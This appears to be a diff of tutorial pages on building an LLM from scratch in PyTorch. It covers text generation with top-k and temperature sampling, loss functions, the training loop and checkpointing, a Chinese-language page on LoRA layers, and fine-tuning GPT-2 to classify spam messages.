ax1.plot(epochs_seen, train_losses, label="Training loss")
|
||||
ax1.plot(
|
||||
epochs_seen, val_losses, linestyle="-.", label="Validation loss"
|
||||
)
|
||||
ax1.set_xlabel("Epochs")
|
||||
ax1.set_ylabel("Loss")
|
||||
ax1.legend(loc="upper right")
|
||||
ax1.xaxis.set_major_locator(MaxNLocator(integer=True))
|
||||
ax2 = ax1.twiny()
|
||||
ax2.plot(tokens_seen, train_losses, alpha=0)
|
||||
ax2.set_xlabel("Tokens seen")
|
||||
fig.tight_layout()
|
||||
plt.show()
|
||||
|
||||
# Compute perplexity from the loss values
|
||||
train_ppls = [math.exp(loss) for loss in train_losses]
|
||||
val_ppls = [math.exp(loss) for loss in val_losses]
|
||||
# Plot perplexity over tokens seen
|
||||
plt.figure()
|
||||
plt.plot(tokens_seen, train_ppls, label='Training Perplexity')
|
||||
plt.plot(tokens_seen, val_ppls, label='Validation Perplexity')
|
||||
plt.xlabel('Tokens Seen')
|
||||
plt.ylabel('Perplexity')
|
||||
plt.title('Perplexity over Training')
|
||||
plt.legend()
|
||||
plt.show()
|
||||
|
||||
epochs_tensor = torch.linspace(0, num_epochs, len(train_losses))
|
||||
plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses)
|
||||
|
||||
|
||||
torch.save({
|
||||
"model_state_dict": model.state_dict(),
|
||||
"optimizer_state_dict": optimizer.state_dict(),
|
||||
},
|
||||
"/tmp/model_and_optimizer.pth"
|
||||
)
|
||||
```
|
||||
|
||||
Let's see an explanation step by step
|
||||
|
||||
### Functions to transform text <--> ids
|
||||
|
||||
These are some simple functions that can be used to transform from texts from the vocabulary to ids and backwards. This is needed at the begging of the handling of the text and at the end fo the predictions:
|
||||
|
||||
```python
|
||||
# Functions to transform from tokens to ids and from to ids to tokens
|
||||
def text_to_token_ids(text, tokenizer):
|
||||
encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'})
|
||||
encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension
|
||||
return encoded_tensor
|
||||
|
||||
def token_ids_to_text(token_ids, tokenizer):
|
||||
flat = token_ids.squeeze(0) # remove batch dimension
|
||||
return tokenizer.decode(flat.tolist())
|
||||
```
|
||||
|
||||
### Generate text functions
|
||||
|
||||
In a previos section a function that just got the **most probable token** after getting the logits. However, this will mean that for each entry the same output is always going to be generated which makes it very deterministic.
|
||||
|
||||
The following `generate_text` function, will apply the `top-k` , `temperature` and `multinomial` concepts.
|
||||
|
||||
- The **`top-k`** means that we will start reducing to `-inf` all the probabilities of all the tokens expect of the top k tokens. So, if k=3, before making a decision only the 3 most probably tokens will have a probability different from `-inf`.
|
||||
- The **`temperature`** means that every probability will be divided by the temperature value. A value of `0.1` will improve the highest probability compared with the lowest one, while a temperature of `5` for example will make it more flat. This helps to improve to variation in responses we would like the LLM to have.
|
||||
- After applying the temperature, a **`softmax`** function is applied again to make all the reminding tokens have a total probability of 1.
|
||||
- Finally, instead of choosing the token with the biggest probability, the function **`multinomial`** is applied to **predict the next token according to the final probabilities**. So if token 1 had a 70% of probabilities, token 2 a 20% and token 3 a 10%, 70% of the times token 1 will be selected, 20% of the times it will be token 2 and 10% of the times will be 10%.
|
||||
|
||||
```python
|
||||
# Generate text function
|
||||
def generate_text(model, idx, max_new_tokens, context_size, temperature=0.0, top_k=None, eos_id=None):
|
||||
|
||||
# For-loop is the same as before: Get logits, and only focus on last time step
|
||||
for _ in range(max_new_tokens):
|
||||
idx_cond = idx[:, -context_size:]
|
||||
with torch.no_grad():
|
||||
logits = model(idx_cond)
|
||||
logits = logits[:, -1, :]
|
||||
|
||||
# New: Filter logits with top_k sampling
|
||||
if top_k is not None:
|
||||
# Keep only top_k values
|
||||
top_logits, _ = torch.topk(logits, top_k)
|
||||
min_val = top_logits[:, -1]
|
||||
logits = torch.where(logits < min_val, torch.tensor(float("-inf")).to(logits.device), logits)
|
||||
|
||||
# New: Apply temperature scaling
|
||||
if temperature > 0.0:
|
||||
logits = logits / temperature
|
||||
|
||||
# Apply softmax to get probabilities
|
||||
probs = torch.softmax(logits, dim=-1) # (batch_size, context_len)
|
||||
|
||||
# Sample from the distribution
|
||||
idx_next = torch.multinomial(probs, num_samples=1) # (batch_size, 1)
|
||||
|
||||
# Otherwise same as before: get idx of the vocab entry with the highest logits value
|
||||
else:
|
||||
idx_next = torch.argmax(logits, dim=-1, keepdim=True) # (batch_size, 1)
|
||||
|
||||
if idx_next == eos_id: # Stop generating early if end-of-sequence token is encountered and eos_id is specified
|
||||
break
|
||||
|
||||
# Same as before: append sampled index to the running sequence
|
||||
idx = torch.cat((idx, idx_next), dim=1) # (batch_size, num_tokens+1)
|
||||
|
||||
return idx
|
||||
```
|
||||
|
||||
> [!NOTE]
|
||||
> There is a common alternative to `top-k` called [**`top-p`**](https://en.wikipedia.org/wiki/Top-p_sampling), also known as nucleus sampling, which instead of getting k samples with the most probability, it **organizes** all the resulting **vocabulary** by probabilities and **sums** them from the highest probability to the lowest until a **threshold is reached**.
|
||||
>
|
||||
> Then, **only those words** of the vocabulary will be considered according to their relative probabilities 
|
||||
>
|
||||
> This allows to not need to select a number of `k` samples, as the optimal k might be different on each case, but **only a threshold**.
|
||||
>
|
||||
> _Note that this improvement isn't included in the previous code._
|
||||
|
||||
> [!NOTE]
|
||||
> Another way to improve the generated text is by using **Beam search** instead of the greedy search sued in this example.\
|
||||
> Unlike greedy search, which selects the most probable next word at each step and builds a single sequence, **beam search keeps track of the top 𝑘 k highest-scoring partial sequences** (called "beams") at each step. By exploring multiple possibilities simultaneously, it balances efficiency and quality, increasing the chances of **finding a better overall** sequence that might be missed by the greedy approach due to early, suboptimal choices.
|
||||
>
|
||||
> _Note that this improvement isn't included in the previous code._
|
||||
|
||||
### Loss functions
|
||||
|
||||
The **`calc_loss_batch`** function calculates the cross entropy of the a prediction of a single batch.\
|
||||
The **`calc_loss_loader`** gets the cross entropy of all the batches and calculates the **average cross entropy**.
|
||||
|
||||
```python
|
||||
# Define loss functions
|
||||
def calc_loss_batch(input_batch, target_batch, model, device):
|
||||
input_batch, target_batch = input_batch.to(device), target_batch.to(device)
|
||||
logits = model(input_batch)
|
||||
loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten())
|
||||
return loss
|
||||
|
||||
def calc_loss_loader(data_loader, model, device, num_batches=None):
|
||||
total_loss = 0.
|
||||
if len(data_loader) == 0:
|
||||
return float("nan")
|
||||
elif num_batches is None:
|
||||
num_batches = len(data_loader)
|
||||
else:
|
||||
# Reduce the number of batches to match the total number of batches in the data loader
|
||||
# if num_batches exceeds the number of batches in the data loader
|
||||
num_batches = min(num_batches, len(data_loader))
|
||||
for i, (input_batch, target_batch) in enumerate(data_loader):
|
||||
if i < num_batches:
|
||||
loss = calc_loss_batch(input_batch, target_batch, model, device)
|
||||
total_loss += loss.item()
|
||||
else:
|
||||
break
|
||||
return total_loss / num_batches
|
||||
```
|
||||
|
||||
> [!NOTE]
|
||||
> **Gradient clipping** is a technique used to enhance **training stability** in large neural networks by setting a **maximum threshold** for gradient magnitudes. When gradients exceed this predefined `max_norm`, they are scaled down proportionally to ensure that updates to the model’s parameters remain within a manageable range, preventing issues like exploding gradients and ensuring more controlled and stable training.
|
||||
>
|
||||
> _Note that this improvement isn't included in the previous code._
|
||||
>
|
||||
> Check the following example:
|
||||
|
||||
<figure><img src="../../images/image (6) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### Loading Data
|
||||
|
||||
The functions `create_dataloader_v1` and `create_dataloader_v1` were already discussed in a previous section.
|
||||
|
||||
From here note how it's defined that 90% of the text is going to be used for training while the 10% will be used for validation and both sets are stored in 2 different data loaders.\
|
||||
Note that some times part of the data set is also left for a testing set to evaluate better the performance of the model.
|
||||
|
||||
Both data loaders are using the same batch size, maximum length and stride and num workers (0 in this case).\
|
||||
The main differences are the data used by each, and the the validators is not dropping the last neither shuffling the data is it's not needed for validation purposes.
|
||||
|
||||
Also the fact that **stride is as big as the context length**, means that there won't be overlapping between contexts used to train the data (reduces overfitting but also the training data set).
|
||||
|
||||
Moreover, note that the batch size in this case it 2 to divide the data in 2 batches, the main goal of this is to allow parallel processing and reduce the consumption per batch.
|
||||
|
||||
```python
|
||||
train_ratio = 0.90
|
||||
split_idx = int(train_ratio * len(text_data))
|
||||
train_data = text_data[:split_idx]
|
||||
val_data = text_data[split_idx:]
|
||||
|
||||
torch.manual_seed(123)
|
||||
|
||||
train_loader = create_dataloader_v1(
|
||||
train_data,
|
||||
batch_size=2,
|
||||
max_length=GPT_CONFIG_124M["context_length"],
|
||||
stride=GPT_CONFIG_124M["context_length"],
|
||||
drop_last=True,
|
||||
shuffle=True,
|
||||
num_workers=0
|
||||
)
|
||||
|
||||
val_loader = create_dataloader_v1(
|
||||
val_data,
|
||||
batch_size=2,
|
||||
max_length=GPT_CONFIG_124M["context_length"],
|
||||
stride=GPT_CONFIG_124M["context_length"],
|
||||
drop_last=False,
|
||||
shuffle=False,
|
||||
num_workers=0
|
||||
)
|
||||
```
|
||||
|
||||
## Sanity Checks
|
||||
|
||||
The goal is to check there are enough tokens for training, shapes are the expected ones and get some info about the number of tokens used for training and for validation:
|
||||
|
||||
```python
|
||||
# Sanity checks
|
||||
if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]:
|
||||
print("Not enough tokens for the training loader. "
|
||||
"Try to lower the `GPT_CONFIG_124M['context_length']` or "
|
||||
"increase the `training_ratio`")
|
||||
|
||||
if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]:
|
||||
print("Not enough tokens for the validation loader. "
|
||||
"Try to lower the `GPT_CONFIG_124M['context_length']` or "
|
||||
"decrease the `training_ratio`")
|
||||
|
||||
print("Train loader:")
|
||||
for x, y in train_loader:
|
||||
print(x.shape, y.shape)
|
||||
|
||||
print("\nValidation loader:")
|
||||
for x, y in val_loader:
|
||||
print(x.shape, y.shape)
|
||||
|
||||
train_tokens = 0
|
||||
for input_batch, target_batch in train_loader:
|
||||
train_tokens += input_batch.numel()
|
||||
|
||||
val_tokens = 0
|
||||
for input_batch, target_batch in val_loader:
|
||||
val_tokens += input_batch.numel()
|
||||
|
||||
print("Training tokens:", train_tokens)
|
||||
print("Validation tokens:", val_tokens)
|
||||
print("All tokens:", train_tokens + val_tokens)
|
||||
```
|
||||
|
||||
### Select device for training & pre calculations
|
||||
|
||||
The following code just select the device to use and calculates a training loss and validation loss (without having trained anything yet) as a starting point.
|
||||
|
||||
```python
|
||||
# Indicate the device to use
|
||||
|
||||
if torch.cuda.is_available():
|
||||
device = torch.device("cuda")
|
||||
elif torch.backends.mps.is_available():
|
||||
device = torch.device("mps")
|
||||
else:
|
||||
device = torch.device("cpu")
|
||||
|
||||
print(f"Using {device} device.")
|
||||
|
||||
model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes
|
||||
|
||||
# Pre-calculate losses without starting yet
|
||||
torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader
|
||||
|
||||
with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet
|
||||
train_loss = calc_loss_loader(train_loader, model, device)
|
||||
val_loss = calc_loss_loader(val_loader, model, device)
|
||||
|
||||
print("Training loss:", train_loss)
|
||||
print("Validation loss:", val_loss)
|
||||
```
|
||||
|
||||
### Training functions
|
||||
|
||||
The function `generate_and_print_sample` will just get a context and generate some tokens in order to get a feeling about how good is the model at that point. This is called by `train_model_simple` on each step.
|
||||
|
||||
The function `evaluate_model` is called as frequently as indicate to the training function and it's used to measure the train loss and the validation loss at that point in the model training.
|
||||
|
||||
Then the big function `train_model_simple` is the one that actually train the model. It expects:
|
||||
|
||||
- The train data loader (with the data already separated and prepared for training)
|
||||
- The validator loader
|
||||
- The **optimizer** to use during training: This is the function that will use the gradients and will update the parameters to reduce the loss. In this case, as you will see, `AdamW` is used, but there are many more.
|
||||
- `optimizer.zero_grad()` is called to reset the gradients on each round to not accumulate them.
|
||||
- The **`lr`** param is the **learning rate** which determines the **size of the steps** taken during the optimization process when updating the model's parameters. A **smaller** learning rate means the optimizer **makes smaller updates** to the weights, which can lead to more **precise** convergence but might **slow down** training. A **larger** learning rate can speed up training but **risks overshooting** the minimum of the loss function (**jump over** the point where the loss function is minimized).
|
||||
- **Weight Decay** modifies the **Loss Calculation** step by adding an extra term that penalizes large weights. This encourages the optimizer to find solutions with smaller weights, balancing between fitting the data well and keeping the model simple preventing overfitting in machine learning models by discouraging the model from assigning too much importance to any single feature.
|
||||
- Traditional optimizers like SGD with L2 regularization couple weight decay with the gradient of the loss function. However, **AdamW** (a variant of Adam optimizer) decouples weight decay from the gradient update, leading to more effective regularization.
|
||||
- The device to use for training
|
||||
- The number of epochs: Number of times to go over the training data
|
||||
- The evaluation frequency: The frequency to call `evaluate_model`
|
||||
- The evaluation iteration: The number of batches to use when evaluating the current state of the model when calling `generate_and_print_sample`
|
||||
- The start context: Which the starting sentence to use when calling `generate_and_print_sample`
|
||||
- The tokenizer
|
||||
|
||||
```python
|
||||
# Functions to train the data
|
||||
def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs,
|
||||
eval_freq, eval_iter, start_context, tokenizer):
|
||||
# Initialize lists to track losses and tokens seen
|
||||
train_losses, val_losses, track_tokens_seen = [], [], []
|
||||
tokens_seen, global_step = 0, -1
|
||||
|
||||
# Main training loop
|
||||
for epoch in range(num_epochs):
|
||||
model.train() # Set model to training mode
|
||||
|
||||
for input_batch, target_batch in train_loader:
|
||||
optimizer.zero_grad() # Reset loss gradients from previous batch iteration
|
||||
loss = calc_loss_batch(input_batch, target_batch, model, device)
|
||||
loss.backward() # Calculate loss gradients
|
||||
optimizer.step() # Update model weights using loss gradients
|
||||
tokens_seen += input_batch.numel()
|
||||
global_step += 1
|
||||
|
||||
# Optional evaluation step
|
||||
if global_step % eval_freq == 0:
|
||||
train_loss, val_loss = evaluate_model(
|
||||
model, train_loader, val_loader, device, eval_iter)
|
||||
train_losses.append(train_loss)
|
||||
val_losses.append(val_loss)
|
||||
track_tokens_seen.append(tokens_seen)
|
||||
print(f"Ep {epoch+1} (Step {global_step:06d}): "
|
||||
f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}")
|
||||
|
||||
# Print a sample text after each epoch
|
||||
generate_and_print_sample(
|
||||
model, tokenizer, device, start_context
|
||||
)
|
||||
|
||||
return train_losses, val_losses, track_tokens_seen
|
||||
|
||||
|
||||
def evaluate_model(model, train_loader, val_loader, device, eval_iter):
|
||||
model.eval() # Set in eval mode to avoid dropout
|
||||
with torch.no_grad():
|
||||
train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter)
|
||||
val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter)
|
||||
model.train() # Back to training model applying all the configurations
|
||||
return train_loss, val_loss
|
||||
|
||||
|
||||
def generate_and_print_sample(model, tokenizer, device, start_context):
|
||||
model.eval() # Set in eval mode to avoid dropout
|
||||
context_size = model.pos_emb.weight.shape[0]
|
||||
encoded = text_to_token_ids(start_context, tokenizer).to(device)
|
||||
with torch.no_grad():
|
||||
token_ids = generate_text(
|
||||
model=model, idx=encoded,
|
||||
max_new_tokens=50, context_size=context_size
|
||||
)
|
||||
decoded_text = token_ids_to_text(token_ids, tokenizer)
|
||||
print(decoded_text.replace("\n", " ")) # Compact print format
|
||||
model.train() # Back to training model applying all the configurations
|
||||
```
|
||||
|
||||
> [!NOTE]
|
||||
> To improve the learning rate there are a couple relevant techniques called **linear warmup** and **cosine decay.**
|
||||
>
|
||||
> **Linear warmup** consist on define an initial learning rate and a maximum one and consistently update it after each epoch. This is because starting the training with smaller weight updates decreases the risk of the model encountering large, destabilizing updates during its training phase.\
|
||||
> **Cosine decay** is a technique that **gradually reduces the learning rate** following a half-cosine curve **after the warmup** phase, slowing weight updates to **minimize the risk of overshooting** the loss minima and ensure training stability in later phases.
|
||||
>
|
||||
> _Note that these improvements aren't included in the previous code._
|
||||
|
||||
### Start training
|
||||
|
||||
```python
|
||||
import time
|
||||
start_time = time.time()
|
||||
|
||||
torch.manual_seed(123)
|
||||
model = GPTModel(GPT_CONFIG_124M)
|
||||
model.to(device)
|
||||
optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1)
|
||||
|
||||
num_epochs = 10
|
||||
train_losses, val_losses, tokens_seen = train_model_simple(
|
||||
model, train_loader, val_loader, optimizer, device,
|
||||
num_epochs=num_epochs, eval_freq=5, eval_iter=5,
|
||||
start_context="Every effort moves you", tokenizer=tokenizer
|
||||
)
|
||||
|
||||
end_time = time.time()
|
||||
execution_time_minutes = (end_time - start_time) / 60
|
||||
print(f"Training completed in {execution_time_minutes:.2f} minutes.")
|
||||
```
|
||||
|
||||
### Print training evolution
|
||||
|
||||
With the following function it's possible to print the evolution of the model while it was being trained.
|
||||
|
||||
```python
|
||||
import matplotlib.pyplot as plt
|
||||
from matplotlib.ticker import MaxNLocator
|
||||
import math
|
||||
def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses):
|
||||
fig, ax1 = plt.subplots(figsize=(5, 3))
|
||||
ax1.plot(epochs_seen, train_losses, label="Training loss")
|
||||
ax1.plot(
|
||||
epochs_seen, val_losses, linestyle="-.", label="Validation loss"
|
||||
)
|
||||
ax1.set_xlabel("Epochs")
|
||||
ax1.set_ylabel("Loss")
|
||||
ax1.legend(loc="upper right")
|
||||
ax1.xaxis.set_major_locator(MaxNLocator(integer=True))
|
||||
ax2 = ax1.twiny()
|
||||
ax2.plot(tokens_seen, train_losses, alpha=0)
|
||||
ax2.set_xlabel("Tokens seen")
|
||||
fig.tight_layout()
|
||||
plt.show()
|
||||
|
||||
# Compute perplexity from the loss values
|
||||
train_ppls = [math.exp(loss) for loss in train_losses]
|
||||
val_ppls = [math.exp(loss) for loss in val_losses]
|
||||
# Plot perplexity over tokens seen
|
||||
plt.figure()
|
||||
plt.plot(tokens_seen, train_ppls, label='Training Perplexity')
|
||||
plt.plot(tokens_seen, val_ppls, label='Validation Perplexity')
|
||||
plt.xlabel('Tokens Seen')
|
||||
plt.ylabel('Perplexity')
|
||||
plt.title('Perplexity over Training')
|
||||
plt.legend()
|
||||
plt.show()
|
||||
|
||||
epochs_tensor = torch.linspace(0, num_epochs, len(train_losses))
|
||||
plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses)
|
||||
```
|
||||
|
||||
### Save the model
|
||||
|
||||
It's possible to save the model + optimizer if you want to continue training later:
|
||||
|
||||
```python
|
||||
# Save the model and the optimizer for later training
|
||||
torch.save({
|
||||
"model_state_dict": model.state_dict(),
|
||||
"optimizer_state_dict": optimizer.state_dict(),
|
||||
},
|
||||
"/tmp/model_and_optimizer.pth"
|
||||
)
|
||||
# Note that this model with the optimizer occupied close to 2GB
|
||||
|
||||
# Restore model and optimizer for training
|
||||
checkpoint = torch.load("/tmp/model_and_optimizer.pth", map_location=device)
|
||||
|
||||
model = GPTModel(GPT_CONFIG_124M)
|
||||
model.load_state_dict(checkpoint["model_state_dict"])
|
||||
optimizer = torch.optim.AdamW(model.parameters(), lr=5e-4, weight_decay=0.1)
|
||||
optimizer.load_state_dict(checkpoint["optimizer_state_dict"])
|
||||
model.train(); # Put in training mode
|
||||
```
|
||||
|
||||
Or just the model if you are planing just on using it:
|
||||
|
||||
```python
|
||||
# Save the model
|
||||
torch.save(model.state_dict(), "model.pth")
|
||||
|
||||
# Load it
|
||||
model = GPTModel(GPT_CONFIG_124M)
|
||||
|
||||
model.load_state_dict(torch.load("model.pth", map_location=device))
|
||||
|
||||
model.eval() # Put in eval mode
|
||||
```
|
||||
|
||||
## Loading GPT2 weights
|
||||
|
||||
There 2 quick scripts to load the GPT2 weights locally. For both you can clone the repository [https://github.com/rasbt/LLMs-from-scratch](https://github.com/rasbt/LLMs-from-scratch) locally, then:
|
||||
|
||||
- The script [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py) will download all the weights and transform the formats from OpenAI to the ones expected by our LLM. The script is also prepared with the needed configuration and with the prompt: "Every effort moves you"
|
||||
- The script [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb) allows you to load any of the GPT2 weights locally (just change the `CHOOSE_MODEL` var) and predict text from some prompts.
|
||||
|
||||
## References
|
||||
|
||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
||||
|
||||
@ -1,61 +0,0 @@
|
||||
# 7.0. LoRA 在微调中的改进
|
||||
|
||||
## LoRA 改进
|
||||
|
||||
> [!TIP]
|
||||
> 使用 **LoRA 大大减少了所需的计算** 来 **微调** 已经训练好的模型。
|
||||
|
||||
LoRA 使得通过仅更改模型的 **小部分** 来高效地微调 **大模型** 成为可能。它减少了需要训练的参数数量,从而节省了 **内存** 和 **计算资源**。这是因为:
|
||||
|
||||
1. **减少可训练参数的数量**:LoRA **将** 权重矩阵分成两个较小的矩阵(称为 **A** 和 **B**),而不是更新模型中的整个权重矩阵。这使得训练 **更快**,并且需要 **更少的内存**,因为需要更新的参数更少。
|
||||
|
||||
1. 这是因为它不是计算层(矩阵)的完整权重更新,而是将其近似为两个较小矩阵的乘积,从而减少了计算更新的复杂性:\
|
||||
|
||||
<figure><img src="../../images/image (9) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
2. **保持原始模型权重不变**:LoRA 允许您保持原始模型权重不变,仅更新 **新的小矩阵**(A 和 B)。这很有帮助,因为这意味着模型的原始知识得以保留,您只需调整必要的部分。
|
||||
3. **高效的任务特定微调**:当您想将模型适应于 **新任务** 时,您只需训练 **小的 LoRA 矩阵**(A 和 B),而将模型的其余部分保持不变。这比重新训练整个模型 **高效得多**。
|
||||
4. **存储效率**:微调后,您只需存储 **LoRA 矩阵**,而不是为每个任务保存 **整个新模型**,这些矩阵与整个模型相比非常小。这使得将模型适应于多个任务而不占用过多存储变得更容易。
|
||||
|
||||
为了在微调过程中实现 LoraLayers 而不是线性层,这里提出了以下代码 [https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb):
|
||||
```python
|
||||
import math
|
||||
|
||||
# Create the LoRA layer with the 2 matrices and the alpha
|
||||
class LoRALayer(torch.nn.Module):
|
||||
def __init__(self, in_dim, out_dim, rank, alpha):
|
||||
super().__init__()
|
||||
self.A = torch.nn.Parameter(torch.empty(in_dim, rank))
|
||||
torch.nn.init.kaiming_uniform_(self.A, a=math.sqrt(5)) # similar to standard weight initialization
|
||||
self.B = torch.nn.Parameter(torch.zeros(rank, out_dim))
|
||||
self.alpha = alpha
|
||||
|
||||
def forward(self, x):
|
||||
x = self.alpha * (x @ self.A @ self.B)
|
||||
return x
|
||||
|
||||
# Combine it with the linear layer
|
||||
class LinearWithLoRA(torch.nn.Module):
|
||||
def __init__(self, linear, rank, alpha):
|
||||
super().__init__()
|
||||
self.linear = linear
|
||||
self.lora = LoRALayer(
|
||||
linear.in_features, linear.out_features, rank, alpha
|
||||
)
|
||||
|
||||
def forward(self, x):
|
||||
return self.linear(x) + self.lora(x)
|
||||
|
||||
# Replace linear layers with LoRA ones
|
||||
def replace_linear_with_lora(model, rank, alpha):
|
||||
for name, module in model.named_children():
|
||||
if isinstance(module, torch.nn.Linear):
|
||||
# Replace the Linear layer with LinearWithLoRA
|
||||
setattr(model, name, LinearWithLoRA(module, rank, alpha))
|
||||
else:
|
||||
# Recursively apply the same function to child modules
|
||||
replace_linear_with_lora(module, rank, alpha)
|
||||
```
|
||||
## 参考文献
|
||||
|
||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
||||
@ -1,117 +0,0 @@
|
||||
# 7.1. Fine-Tuning for Classification
|
||||
|
||||
## What is
|
||||
|
||||
Fine-tuning is the process of taking a **pre-trained model** that has learned **general language patterns** from vast amounts of data and **adapting** it to perform a **specific task** or to understand domain-specific language. This is achieved by continuing the training of the model on a smaller, task-specific dataset, allowing it to adjust its parameters to better suit the nuances of the new data while leveraging the broad knowledge it has already acquired. Fine-tuning enables the model to deliver more accurate and relevant results in specialized applications without the need to train a new model from scratch.
|
||||
|
||||
> [!NOTE]
|
||||
> As pre-training a LLM that "understands" the text is pretty expensive it's usually easier and cheaper to to fine-tune open source pre-trained models to perform a specific task we want it to perform.
|
||||
|
||||
> [!TIP]
|
||||
> The goal of this section is to show how to fine-tune an already pre-trained model so instead of generating new text the LLM will select give the **probabilities of the given text being categorized in each of the given categories** (like if a text is spam or not).
|
||||
|
||||
## Preparing the data set
|
||||
|
||||
### Data set size
|
||||
|
||||
Of course, in order to fine-tune a model you need some structured data to use to specialise your LLM. In the example proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb), GPT2 is fine tuned to detect if an email is spam or not using the data from [https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip](https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip)_._
|
||||
|
||||
This data set contains much more examples of "not spam" that of "spam", therefore the book suggest to **only use as many examples of "not spam" as of "spam"** (therefore, removing from the training data all the extra examples). In this case, this was 747 examples of each.
|
||||
|
||||
Then, **70%** of the data set is used for **training**, **10%** for **validation** and **20%** for **testing**.
|
||||
|
||||
- The **validation set** is used during the training phase to fine-tune the model's **hyperparameters** and make decisions about model architecture, effectively helping to prevent overfitting by providing feedback on how the model performs on unseen data. It allows for iterative improvements without biasing the final evaluation.
|
||||
- This means that although the data included in this data set is not used for the training directly, it's used to tune the best **hyperparameters**, so this set cannot be used to evaluate the performance of the model like the testing one.
|
||||
- In contrast, the **test set** is used **only after** the model has been fully trained and all adjustments are complete; it provides an unbiased assessment of the model's ability to generalize to new, unseen data. This final evaluation on the test set gives a realistic indication of how the model is expected to perform in real-world applications.
|
||||
|
||||
### Entries length
|
||||
|
||||
As the training example expects entries (emails text in this case) of the same length, it was decided to make every entry as large as the largest one by adding the ids of `<|endoftext|>` as padding.
|
||||
|
||||
### Initialize the model
|
||||
|
||||
Using the open-source pre-trained weights initialize the model to train. We have already done this before and follow the instructions of [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) you can easily do it.
|
||||
|
||||
## Classification head
|
||||
|
||||
In this specific example (predicting if a text is spam or not), we are not interested in fine tune according to the complete vocabulary of GPT2 but we only want the new model to say if the email is spam (1) or not (0). Therefore, we are going to **modify the final layer that** gives the probabilities per token of the vocabulary for one that only gives the probabilities of being spam or not (so like a vocabulary of 2 words).
|
||||
|
||||
```python
|
||||
# This code modified the final layer with a Linear one with 2 outs
|
||||
num_classes = 2
|
||||
model.out_head = torch.nn.Linear(
|
||||
|
||||
in_features=BASE_CONFIG["emb_dim"],
|
||||
|
||||
out_features=num_classes
|
||||
)
|
||||
```
|
||||
|
||||
## Parameters to tune
|
||||
|
||||
In order to fine tune fast it's easier to not fine tune all the parameters but only some final ones. This is because it's known that the lower layers generally capture basic language structures and semantics applicable. So, just **fine tuning the last layers is usually enough and faster**.
|
||||
|
||||
```python
|
||||
# This code makes all the parameters of the model unrtainable
|
||||
for param in model.parameters():
|
||||
param.requires_grad = False
|
||||
|
||||
# Allow to fine tune the last layer in the transformer block
|
||||
for param in model.trf_blocks[-1].parameters():
|
||||
param.requires_grad = True
|
||||
|
||||
# Allow to fine tune the final layer norm
|
||||
for param in model.final_norm.parameters():
|
||||
|
||||
param.requires_grad = True
|
||||
```
|
||||
|
||||
## Entries to use for training
|
||||
|
||||
In previos sections the LLM was trained reducing the loss of every predicted token, even though almost all the predicted tokens were in the input sentence (only 1 at the end was really predicted) in order for the model to understand better the language.
|
||||
|
||||
In this case we only care on the model being able to predict if the model is spam or not, so we only care about the last token predicted. Therefore, it's needed to modify out previous training loss functions to only take into account that token.
|
||||
|
||||
This is implemented in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) as:
|
||||
|
||||
```python
|
||||
def calc_accuracy_loader(data_loader, model, device, num_batches=None):
|
||||
model.eval()
|
||||
correct_predictions, num_examples = 0, 0
|
||||
|
||||
if num_batches is None:
|
||||
num_batches = len(data_loader)
|
||||
else:
|
||||
num_batches = min(num_batches, len(data_loader))
|
||||
for i, (input_batch, target_batch) in enumerate(data_loader):
|
||||
if i < num_batches:
|
||||
input_batch, target_batch = input_batch.to(device), target_batch.to(device)
|
||||
|
||||
with torch.no_grad():
|
||||
logits = model(input_batch)[:, -1, :] # Logits of last output token
|
||||
predicted_labels = torch.argmax(logits, dim=-1)
|
||||
|
||||
num_examples += predicted_labels.shape[0]
|
||||
correct_predictions += (predicted_labels == target_batch).sum().item()
|
||||
else:
|
||||
break
|
||||
return correct_predictions / num_examples
|
||||
|
||||
|
||||
def calc_loss_batch(input_batch, target_batch, model, device):
|
||||
input_batch, target_batch = input_batch.to(device), target_batch.to(device)
|
||||
logits = model(input_batch)[:, -1, :] # Logits of last output token
|
||||
loss = torch.nn.functional.cross_entropy(logits, target_batch)
|
||||
return loss
|
||||
```
|
